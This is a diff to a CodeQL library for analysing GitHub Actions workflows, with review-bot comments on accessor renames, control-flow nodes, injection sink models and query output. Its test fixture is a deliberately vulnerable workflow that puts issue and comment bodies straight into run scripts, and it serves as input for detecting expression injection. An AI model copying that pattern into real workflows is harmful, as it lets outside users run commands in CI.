@@ -654,15 +779,15 @@ class StepsExpression extends ContextExpression { string fieldName; StepsExpression() { - expr.regexpMatch(stepsCtxRegex()) and - stepId = expr.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + expression.regexpMatch(stepsCtxRegex()) and + stepId = expression.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expression.regexpCapture(stepsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - this.getLocation().getFile() = result.getLocation().getFile() and + override AstNode getTarget() { + this.getFile() = result.getFile() and result.(Step).getId() = stepId } } @@ -678,9 +803,9 @@ class NeedsExpression extends ContextExpression { string fieldName; NeedsExpression() { - expr.regexpMatch(needsCtxRegex()) and - neededJobId = expr.regexpCapture(needsCtxRegex(), 1) and - fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + expression.regexpMatch(needsCtxRegex()) and + neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and + fieldName = expression.regexpCapture(needsCtxRegex(), 2) and neededJob.getId() = neededJobId } @@ -688,8 +813,8 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - neededJob.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + neededJob.getFile() = this.getFile() and this.getJob().getANeededJob() = neededJob and ( // regular jobs 
@@ -711,17 +836,17 @@ class JobsExpression extends ContextExpression { string fieldName; JobsExpression() { - expr.regexpMatch(jobsCtxRegex()) and - jobId = expr.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + expression.regexpMatch(jobsCtxRegex()) and + jobId = expression.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expression.regexpCapture(jobsCtxRegex(), 2) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Job job | job.getId() = jobId and - job.getLocation().getFile() = this.getLocation().getFile() and + job.getFile() = this.getFile() and job.getOutputs() = result ) } @@ -736,14 +861,14 @@ class InputsExpression extends ContextExpression { string fieldName; InputsExpression() { - expr.regexpMatch(inputsCtxRegex()) and - fieldName = expr.regexpCapture(inputsCtxRegex(), 1) + expression.regexpMatch(inputsCtxRegex()) and + fieldName = expression.regexpCapture(inputsCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { - result.getLocation().getFile() = this.getLocation().getFile() and + override AstNode getTarget() { + result.getFile() = this.getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) or @@ -761,15 +886,15 @@ class EnvExpression extends ContextExpression { string fieldName; EnvExpression() { - expr.regexpMatch(envCtxRegex()) and - fieldName = expr.regexpCapture(envCtxRegex(), 1) + expression.regexpMatch(envCtxRegex()) and + fieldName = expression.regexpCapture(envCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(WorkflowNode s | - s.getEnvVar(fieldName) = result and + s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) } 
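Review bot: `EnvExpression.getTarget()` now resolves through `getInScopeEnvVarExpr`, whose definition in this commit yields only the `${{ }}` expressions inside the env value, so as far as the visible code shows `${{ env.FOO }}` has no target when `FOO` is a plain literal and has several targets when the value contains several expressions, whereas the old `getEnvVar` returned the value node itself. If that is intended, record it on the override, e.g. `/** Gets the ${{ }} expressions of the in-scope `env` entry named `fieldName`; none if the value is a literal. */`; otherwise flows that pass through a literal-valued env var are silently dropped rather than reported. The enclosing `EnvExpression` class starts before this hunk.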
@@ -784,13 +909,13 @@ class MatrixExpression extends ContextExpression { string fieldName; MatrixExpression() { - expr.regexpMatch(matrixCtxRegex()) and - fieldName = expr.regexpCapture(matrixCtxRegex(), 1) + expression.regexpMatch(matrixCtxRegex()) and + fieldName = expression.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override WorkflowNode getTarget() { + override AstNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll index 402ceae44ced..49b83df48db5 100644 --- a/ql/lib/codeql/actions/ast/internal/Yaml.qll +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -11,7 +11,14 @@ private module YamlSig implements LibYaml::InputSig { import codeql.Locations class LocatableBase extends @yaml_locatable { - Location getLocation() { yaml_locations(this, result) } + Location getLocation() { + exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec | + f.getAbsolutePath() = p and + locations_default(loc, f, sl, sc, el, ec) and + yaml_locations(this, loc) and + result = TBaseLocation(p, sl, sc, el, ec) + ) + } string toString() { none() } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 6015e6336ca2..0972ae500398 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -80,7 +80,7 @@ module Completion { } module CfgScope { - abstract class CfgScope extends AstNode { } + abstract class CfgScope extends WorkflowNode { } class WorkflowScope extends CfgScope instanceof Workflow { } 
@@ -148,7 +148,7 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos rank[i](AstNode child, Location l | ( child = this.(CompositeAction).getAnInput() or - child = this.(CompositeAction).getAnOutput() or + child = this.(CompositeAction).getAnOutputExpr() or child = this.(CompositeAction).getRuns() ) and l = child.getLocation() @@ -172,7 +172,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { rank[i](AstNode child, Location l | ( child = this.(ReusableWorkflow).getAnInput() or - child = this.(ReusableWorkflow).getAnOutput() or + child = this.(ReusableWorkflow).getAnOutputExpr() or child = this.(ReusableWorkflow).getStrategy() or child = this.(ReusableWorkflow).getAJob() ) and @@ -202,7 +202,7 @@ private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - child = super.getOutput(_) and l = child.getLocation() + child = super.getOutputExpr(_) and l = child.getLocation() | child order by @@ -247,7 +247,7 @@ private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getArgument(_) or child = super.getEnvVar(_)) and + (child = super.getArgumentExpr(_) or child = super.getInScopeEnvVarExpr(_)) and l = child.getLocation() | child @@ -261,7 +261,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getEnvVar(_) or child = super.getScript()) and + (child = super.getInScopeEnvVarExpr(_) or child = super.getScript()) and l = child.getLocation() | child 
@@ -271,8 +271,21 @@ private class RunTree extends StandardPreOrderTree instanceof Run { } } +private class StringValueTree extends StandardPreOrderTree instanceof StringValue { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](ExpressionNode child, int sl, int el, int sc, int ec, string path | + child = super.getAChildNode() and child.hasLocationInfo(path, sl, sc, el, ec) + | + child order by sl, sc, ec, el, child.toString() + ) + } +} + private class UsesLeaf extends LeafTree instanceof Uses { } private class InputTree extends LeafTree instanceof Input { } -private class StringLiteralLeaf extends LeafTree instanceof StringLiteral { } +private class StringValueLeaf extends LeafTree instanceof StringValue { } + +private class ExpressionLeaf extends LeafTree instanceof ExpressionNode { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c427f8b828a0..008b5a19ce63 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -52,7 +52,7 @@ predicate externallyDefinedSource( ) and ( if fieldName.trim().matches("env.%") - then source.asExpr() = uses.getEnvVar(fieldName.trim().replaceAll("env.", "")) + then source.asExpr() = uses.getInScopeEnvVarExpr(fieldName.trim().replaceAll("env.", "")) else if fieldName.trim().matches("output.%") then source.asExpr() = uses @@ -76,10 +76,10 @@ predicate externallyDefinedStoreStep( ) and ( if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and succ.asExpr() = uses 
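Review bot: After this hunk every `StringValue` is matched by both `StringValueTree` (a `StandardPreOrderTree` with `ExpressionNode` children) and `StringValueLeaf` (a `LeafTree`), because both are declared `instanceof StringValue` with no disambiguating condition; unless the CFG library tolerates one node being both a tree and a leaf, strings that contain expressions can get duplicate or contradictory successor edges. Restrict the leaf to strings without expressions, e.g. `private class StringValueLeaf extends LeafTree instanceof StringValue { StringValueLeaf() { not exists(this.(StringValue).getAnExpression()) } }`, or drop it if every `StringValue` is now a tree. In `StringValueTree.getChildNode` the `order by sl, sc, ec, el` places the end column before the end line; `sl, sc, el, ec` matches the order `hasLocationInfo` declares and what a reader expects.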
@@ -90,10 +90,10 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") - then sink.asExpr() = uses.getEnvVar(input.trim().replaceAll("env.", "")) + then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) else if input.trim().matches("input.%") - then sink.asExpr() = uses.getArgument(input.trim().replaceAll("input.", "")) + then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and sinkModel(action, version, input, kind) and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0dea91af2b92..7cfde2a6f9ff 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -36,7 +36,7 @@ class AdditionalTaintStep extends Unit { predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and - r.getEnvVar(varName) = pred.asExpr() and + r.getInScopeEnvVarExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript().getValue() and line = script.splitAt("\n") and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 57ef47434871..65e2abaa6c64 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
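Review bot: `input.trim().replaceAll("input.", "")` (and the `env.` counterpart) strips every occurrence of the substring, not only the leading prefix, so a model row whose input name itself contains `input.` or `env.` is looked up under a mangled key and the sink is silently lost; since the preceding `matches("input.%")` already anchors on the prefix, use `input.trim().suffix("input.".length())` or `input.trim().regexpReplaceAll("^input\\.", "")`. The same pattern appears in `externallyDefinedSource` and `externallyDefinedStoreStep` in the previous hunks, so fix all three together. On the sink side this matters more than it looks: a dropped model row such as `actions/github-script` `input.script` turns a true expression-injection finding into a false negative with no error.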
@@ -72,8 +72,7 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -85,8 +84,7 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - Location getLocation() { result = super.getLocation() } - + //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() @@ -162,7 +160,7 @@ class ParameterPosition extends string { * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(Uses e).getArgument(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -232,7 +230,7 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvExpression astTo | + exists(AstNode astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( @@ -301,7 +299,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { exists(Outputs out, string fieldName | - node1.asExpr() = out.getOutput(fieldName) and + node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) ) 
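Review bot: Both `getLocation()` members are replaced by commented-out code (`//Location getLocation() { ... }`) in the `@@ -72,8 +72,7 @@` and `@@ -84,8 +84,7 @@` hunks rather than deleted, with no explanation of why `DataFlowCall` and `DataFlowCallable` lost their location; either drop the lines or replace them with a one-line comment such as `// getLocation() intentionally omitted: <reason>`. In the `@@ -230,7 +230,7 @@` hunk, widening `astFrom` from `Expression` to `AstNode` lets `envCtxLocalStep` consider any AST node as a flow origin; if `nodeFrom.asExpr()` can already yield non-expression nodes this is presumably needed, but a short comment on why the wider type is required would help the next reader. Both predicates continue beyond their hunks.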
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 3a21005e29be..dbae273151b0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -78,12 +78,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(Uses e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/actions_github-script.model.yml similarity index 57% rename from ql/lib/ext/PLACEHOLDER.model.yml rename to ql/lib/ext/actions_github-script.model.yml index 2f549573a533..df5b1f70ae56 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,5 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["","","",""] + - ["actions/github-script","*","input.script","expression-injection"] + + diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index ac829c2395e8..096c19b48d04 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql 
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 02e17b76ac5c..0edeb0a7ec80 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index 7ca865609983..59a05f64b6c9 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(CompositeAction c | c.getAnOutput() = sink.asExpr()) + exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index fd4350efae8a..040251045c87 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
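Review bot: The `ExpressionInjectionSink` class changed here is copied verbatim into `ReusableWorkflowsSinks.ql`, `CriticalExpressionInjection.ql` and `ExpressionInjection.ql` (the `@@ -18,7 +18,7 @@` and `@@ -19,7 +19,7 @@` hunks on the following lines), and this commit had to touch all four copies; moving it into a shared library module, e.g. next to `externallyDefinedSink` in `codeql.actions.dataflow.ExternalFlow`, would keep the sink definition in one place. The new `e.getScript().getAnExpression() = this.asExpr()` line narrows the sink from the whole script to each `${{ }}` expression in it, which the `$@` link in the updated `select` clauses relies on, so the four copies must stay in sync.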
@@ -18,7 +18,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index 7b0f3159357c..6e88f36feced 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 699c5b2b5dcb..4f710a16e8f6 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -22,7 +22,7 @@ private module MyConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflow w | w.getAnOutput() = sink.asExpr()) + exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 1f7797b8a0a7..590660ce63b1 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -43,4 +43,5 @@ where .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getExpression() diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 0bf4e858db20..0d0bb39c41ea 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(Run e | e.getScript() = this.asExpr()) or + exists(Run e | e.getScript().getAnExpression() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -37,4 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection, which may be controlled by an external user." + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(ExpressionNode).getRawExpression() diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 2e3dc7049bd6..db341e0c5ccc 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql 
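Review bot: The two updated `select` clauses disagree on the link text: `CriticalExpressionInjection.ql` uses `sink.getNode().asExpr().(ExpressionNode).getExpression()` while `ExpressionInjection.ql` uses `.getRawExpression()`, so the same sink is reported with different text by the two queries; pick one (the raw form presumably preserves what the author wrote) and use it in both. The `.(ExpressionNode)` cast in the `select` also means that any sink whose `asExpr()` is not an `ExpressionNode`, including model-defined sinks from `externallyDefinedSink` if `getArgumentExpr` can yield other node kinds, drops out of the results silently instead of being reported with a fallback message. The new `test.expected` rows show that expressions in folded (`>`) and quoted multi-line scalars share one location covering the whole scalar (e.g. `14:9:15:46` for both expressions), so the `$@` link will highlight the entire script in those cases; worth a comment in the query or a follow-up issue.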
@@ -39,8 +39,7 @@ where job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgument("ref") - .(Expression) + .getArgumentExpr("ref") .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", diff --git a/ql/test/library-tests/.github/workflows/expression_nodes.yml b/ql/test/library-tests/.github/workflows/expression_nodes.yml new file mode 100644 index 000000000000..1d40cabdd6ac --- /dev/null +++ b/ql/test/library-tests/.github/workflows/expression_nodes.yml @@ -0,0 +1,22 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: LINE 1echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + - run: > + LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}' + - run: | + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' + - run: "LINE 1 echo '${{ github.event.comment.body }}' + echo '${{github.event.issue.body}}'" + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4d290a906044..ca481768671c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
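Review bot: The new `expression_nodes.yml` fixture exercises `${{ }}` expressions only in `run:` scalars, while this commit also adds the `actions/github-script` `input.script` sink model in `actions_github-script.model.yml`; a step using `actions/github-script@<version>` with `script: ${{ github.event.comment.body }}` would cover the model-driven path through `externallyDefinedSink` and `getArgumentExpr`, which currently has no test. Line 7 of the fixture reads `LINE 1echo '...'` (missing space), and the expected output now bakes that typo into several rows; fixing it before the expected file grows further avoids churn later.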
@@ -1,6 +1,36 @@ files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | yamlNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | +| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -71,15 +101,47 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| 
.github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output 